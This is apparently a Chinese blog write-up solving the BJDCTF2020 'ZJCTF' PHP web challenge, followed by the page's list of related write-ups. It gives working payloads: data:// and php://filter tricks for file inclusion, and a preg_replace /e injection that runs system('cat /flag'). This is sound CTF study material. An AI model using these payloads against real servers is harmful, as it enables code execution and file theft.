[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量1.3k 收藏
点赞数
分类专栏: writeup 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46266956/article/details/124356454
版权

[BJDCTF2020]ZJCTF,不过如此

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

这种题写过,两个漏洞,file_get_contents(),include()

1.file_get_contents()有两种方法:php://input,data://

​ php://input,内容post进去,但没成功

​ data://,payload:/?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

2.include(),用上述php://filter

file=php://filter/convert.base64-encode/resource=next.php

得到base64,解码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

这里就知道eval执行代码,于是查资料:

preg_replace()的/e模式存在命令执行漏洞

​ https://xz.aliyun.com/t/2557深入研究preg_replace与代码执行

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储

 \1 实际上指定的是第一个子匹配项

因此,$re需要合法的传来,并且需要一次匹配到后面的函数:

\S*

$str,只需要执行一下getFlag函数即可:

${getFlag()}或者{${getFlag()}}

因此,payload:

/?\S*={${getFlag()}}&cmd=system('cat /flag');

在这里插入图片描述

总结:对正则表达式那里感觉挺难,看懂之后就很有意思;

Jerem1ah
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[BJDCTF2020]ZJCTF不过如此 -wp
freerats的博客
08-02 477
打开容器,进行代码审计 传入text和file参数,第一个可以用data伪协议绕过,然后接下来是一个文件包含,可以用php协议读取数据。 无法直接打开提示的next.php,所以用php协议读一下。 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php 读出的源码如下 <?php $id = $_GET['id']; $_SESS.
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2278
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码中仅包含 0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。我们先看第二个参数中的\1 ,\1实际上就是 \1,而 \1 在正则表达式中有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号中的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
[ctf web][BJDCTF2020]ZJCTF不过如此 writeup | preg_replace 函数/e模式命令执行
ShenZ的博客
08-16 283
[BJDCTF2020]ZJCTF不过如此 [BJDCTF2020]ZJCTF不过如此 wp preg_replace 函数/e模式命令执行 参考文章:https://www.cesafe.com/html/6999.html
[BJDCTF2020]ZJCTF不过如此1
最新发布
m0_73673698的博客
06-17 1009
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2690
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 223
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
justCTF-2020:justCTF 2020
05-24
《justCTF 2020:HTML技术在网络安全竞赛中的应用探析》 ...同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体挑战,学习并复盘过去的案例,以期在未来类似的竞争中取得更好的成绩。
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
【BUUCTF】[BJDCTF2020]ZJCTF不过如此
aoao331198的博客
04-14 1222
看看源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg
[BJDCTF2020]ZJCTF不过如此 简单思路及做法
EC_Carrot的博客
12-07 858
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
BUUCTF [web专项39][BJDCTF2020]ZJCTF不过如此
yanglinchiji的博客
11-20 247
这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。在 PHP 中,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串中使用正则表达式搜索和替换指定的文本。`preg_replace` 函数返回一个替换后的字符串或数组。作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();( 开始定义一个捕获分组,并匹配其中的子表达式;
ctf php正则截断,记[BJDCTF2020]ZJCTF不过如此 关于php的正则匹配问题
weixin_42099942的博客
03-17 534
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jerem1ah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值